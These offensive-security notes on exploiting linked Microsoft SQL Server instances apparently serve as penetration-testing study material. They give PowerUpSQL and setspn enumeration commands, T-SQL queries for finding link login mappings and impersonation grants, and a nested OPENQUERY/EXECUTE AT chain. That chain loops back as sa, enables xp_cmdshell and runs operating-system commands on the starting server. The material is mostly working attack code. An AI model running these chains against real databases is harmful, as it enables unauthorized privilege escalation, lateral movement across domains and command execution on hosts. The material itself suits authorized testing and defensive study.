Linked SQL Servers

If linked SQL servers exist, it may be possible to exploit them, depending on the security context the link runs under (the login the link is mapped to on the remote side). Links are one-directional: a link from instance 1 to instance 2 does not by itself give instance 2 any access to instance 1, so each direction has to be enumerated separately.

Microsoft's OPENQUERY documentation states that it cannot be used to execute (extended) stored procedures on a linked server. In practice it works, as long as the query returns a result set (prefix a "SELECT 1;" in front of procedures that return no rows, e.g. sp_configure/RECONFIGURE). OPENQUERY also does not require RPC Out to be enabled on the link, unlike EXECUTE ... AT.

Enumerate for linked servers

with PowerUpSQL (crawls every link recursively and reports the login context on each hop):
Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1

#run a query on every reachable link; here to list logins that could be a target for EXECUTE AS LOGIN
Get-SqlServerLinkCrawl -Verbose -Instance SQLSERVER1\Instance1 -Query "select * from master..syslogins" | ft

Links may also point to SQL servers in another domain or forest; those are compromised the same way. Registered MSSQLSvc SPNs are an easy way to find the instances there:

enum across a trusted domain: setspn -T corp1 -Q MSSQLSvc/*

enum across a trusted forest: setspn -T corp2.com -Q MSSQLSvc/*

It is possible to land as a privileged login on another server even when we only have low privileges on the original server, because the link is mapped to a fixed remote login (often sa) rather than forwarding our own credentials. If the link context is no better than our own, try impersonation (EXECUTE AS LOGIN) using the logins from the crawl output above.
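The same enumeration done in T-SQL from an existing low-privilege login, as an added example that is not part of the original notes or of PowerUpSQL: which links exist and how their logins are mapped, what context each link gives us on the far side, whether the far side links back, and which local logins we are allowed to impersonate. The server names SQLSERVER1 and SQLSERVER2 are placeholders.

```sql
-- Added example (not the original notes' code). Run on the instance we already
-- have a login on; SQLSERVER2 is a placeholder for each link_name found in step 1.

-- 1. Links on this instance, the outbound login mapping and whether RPC Out is
--    enabled (needed for EXECUTE ... AT; OPENQUERY does not need it).
--    local_principal_id = 0 is the default mapping that applies to all logins.
SELECT s.name                 AS link_name,
       s.data_source,
       s.is_rpc_out_enabled,
       ll.local_principal_id,
       ll.uses_self_credential,   -- 1: our own login context is forwarded
       ll.remote_name             -- fixed remote login (e.g. 'sa') when mapped
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1;

-- 2. Security context we get on the far side of a link.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT @@SERVERNAME AS remote_server,
          SYSTEM_USER  AS remote_login,
          IS_SRVROLEMEMBER(''sysadmin'') AS remote_is_sysadmin');

-- 3. Does the far side link back to us, or onwards to a third instance?
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT name, data_source, is_rpc_out_enabled
   FROM sys.servers WHERE is_linked = 1');

-- 4. Fallback when the link context is no better than our own: server-level
--    IMPERSONATE grants that let a login run EXECUTE AS LOGIN = '<target>'.
SELECT gr.name AS grantee, pr.name AS can_impersonate
FROM sys.server_permissions pe
JOIN sys.server_principals gr ON gr.principal_id = pe.grantee_principal_id
JOIN sys.server_principals pr ON pr.principal_id = pe.major_id
WHERE pe.permission_name = 'IMPERSONATE';
-- e.g.: EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER; REVERT;
```

Step 2 is the check that matters: a link whose remote_login is sa or remote_is_sysadmin = 1 is a privilege escalation on the remote instance regardless of what we are locally. Repeat steps 2 and 3 for every link_name, and for every link found in step 3 by nesting one more OPENQUERY.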

Command Execution

When the link from instance 1 to instance 2 runs in the sa context, and instance 2 in turn has a link back to instance 1, we can follow the link to instance 2 to obtain the sa context and return over the second link to instance 1, arriving as sysadmin on the server we started on. Useful when no other local privilege escalation path exists on instance 1.
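The loop described above carried out with nested OPENQUERY, as an added example that is not part of the original notes: hop out to instance 2, come back over its link as sa, enable xp_cmdshell on instance 1 and run a command. SQLSERVER1 and SQLSERVER2 are placeholders, and it is assumed that SQLSERVER1 -> SQLSERVER2 is mapped to sa and that SQLSERVER2 -> SQLSERVER1 lands in a sysadmin context (fixed sa mapping, or self-mapping of sa).

```sql
-- Added example (not the original notes' code). We are a low-privilege login on
-- SQLSERVER1. Each OPENQUERY nesting level doubles the single quotes of the level
-- inside it, so a literal quote in the innermost query is written as ''''.

-- Hop 1: confirm the link to SQLSERVER2 gives us sa there.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS is_sa');

-- Hop 2: SQLSERVER1 -> SQLSERVER2 -> SQLSERVER1. We should now be sysadmin "at home".
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT * FROM OPENQUERY([SQLSERVER1],
     ''SELECT SYSTEM_USER AS back_home, IS_SRVROLEMEMBER(''''sysadmin'''') AS is_sa'')');

-- Enable xp_cmdshell on SQLSERVER1 through the loop. sp_configure/RECONFIGURE
-- return no rowset and OPENQUERY insists on one, hence the leading SELECT 1.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT * FROM OPENQUERY([SQLSERVER1],
     ''SELECT 1; EXEC sp_configure ''''show advanced options'''', 1; RECONFIGURE;
       EXEC sp_configure ''''xp_cmdshell'''', 1; RECONFIGURE;'')');

-- Run the command. xp_cmdshell returns its output as a result set, so no SELECT 1
-- is needed and the output comes back through both links.
SELECT * FROM OPENQUERY([SQLSERVER2],
  'SELECT * FROM OPENQUERY([SQLSERVER1],
     ''EXEC master..xp_cmdshell ''''whoami'''''')');

-- Same loop with EXECUTE ... AT, which needs RPC Out enabled on both links but
-- has no result-set requirement. The quote doubling per hop is identical.
EXECUTE('EXECUTE(''EXEC master..xp_cmdshell ''''whoami'''''') AT [SQLSERVER1]') AT [SQLSERVER2];
```

Check the is_sa column after hop 2 before touching sp_configure; if the return link is self-mapped, our own low-privilege login comes back and the RECONFIGURE step simply fails with a permission error. The whoami output is the SQL Server service account of SQLSERVER1, which is the context any further host-level work runs in.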
